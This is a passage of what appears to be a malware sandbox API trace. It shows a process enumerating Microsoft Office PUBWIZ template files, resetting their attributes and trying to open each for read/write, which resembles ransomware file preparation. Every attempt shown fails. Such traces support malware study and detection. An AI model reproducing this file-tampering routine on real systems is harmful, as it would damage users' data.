dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.788] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.788] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML", dwFileAttributes=0x80) returned 0 [0137.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.788] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.788] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RSPMECH.POC", dwFileAttributes=0x80) returned 0 [0137.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RSPMECH.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\rspmech.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.789] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.789] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.789] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC", dwFileAttributes=0x80) returned 0 [0137.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidbar98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.800] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.800] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARBB.DPV", dwFileAttributes=0x80) returned 0 [0137.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidebarbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.802] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.802] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARBB.POC", dwFileAttributes=0x80) returned 0 [0137.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidebarbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.802] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.802] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARVERTBB.DPV", dwFileAttributes=0x80) returned 0 [0137.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidebarvertbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.803] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.803] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARVERTBB.POC", dwFileAttributes=0x80) returned 0 [0137.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDEBARVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidebarvertbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.803] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.803] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.DPV", dwFileAttributes=0x80) returned 0 [0137.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.804] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.804] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.804] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML", dwFileAttributes=0x80) returned 0 [0137.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.804] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.804] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.804] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN98.POC", dwFileAttributes=0x80) returned 0 [0137.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.805] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.805] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGNHM.POC", dwFileAttributes=0x80) returned 0 [0137.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGNHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\signhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.806] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SNIPE.POC", dwFileAttributes=0x80) returned 0 [0137.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SNIPE.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\snipe.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.806] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.806] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYBB.DPV", dwFileAttributes=0x80) returned 0 [0137.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\storybb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.807] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.807] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.807] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYBB.POC", dwFileAttributes=0x80) returned 0 [0137.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\storybb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.807] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.807] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.808] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYVERTBB.DPV", dwFileAttributes=0x80) returned 0 [0137.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\storyvertbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.808] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.808] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.808] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.808] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYVERTBB.POC", dwFileAttributes=0x80) returned 0 [0137.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STORYVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\storyvertbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.809] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STRBRST.POC", dwFileAttributes=0x80) returned 0 [0137.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\STRBRST.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\strbrst.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.810] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.810] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\TEAROFF.POC", dwFileAttributes=0x80) returned 0 [0137.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\TEAROFF.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\tearoff.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.810] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.810] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.810] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\TOC98.POC", dwFileAttributes=0x80) returned 0 [0137.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\TOC98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\toc98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.811] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.811] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.811] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WCOMP98.POC", dwFileAttributes=0x80) returned 0 [0137.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WCOMP98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wcomp98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.811] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.811] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.811] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEB11.POC", dwFileAttributes=0x80) returned 0 [0137.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEB11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\web11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.812] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.812] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBCALSO.POC", dwFileAttributes=0x80) returned 0 [0137.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBCALSO.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webcalso.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.813] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.813] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.813] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBEMAIL.POC", dwFileAttributes=0x80) returned 0 [0137.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBEMAIL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webemail.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.813] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.813] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.813] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBHED98.POC", dwFileAttributes=0x80) returned 0 [0137.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBHED98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webhed98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.814] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.814] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBHOME.POC", dwFileAttributes=0x80) returned 0 [0137.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBHOME.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webhome.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.815] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.815] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBLINK.POC", dwFileAttributes=0x80) returned 0 [0137.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBLINK.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\weblink.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.815] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.815] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.815] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.DPV", dwFileAttributes=0x80) returned 0 [0137.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.816] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.816] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML", dwFileAttributes=0x80) returned 0 [0137.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.816] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.816] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.DPV", dwFileAttributes=0x80) returned 0 [0137.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.817] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.817] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML", dwFileAttributes=0x80) returned 0 [0137.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.xml"), 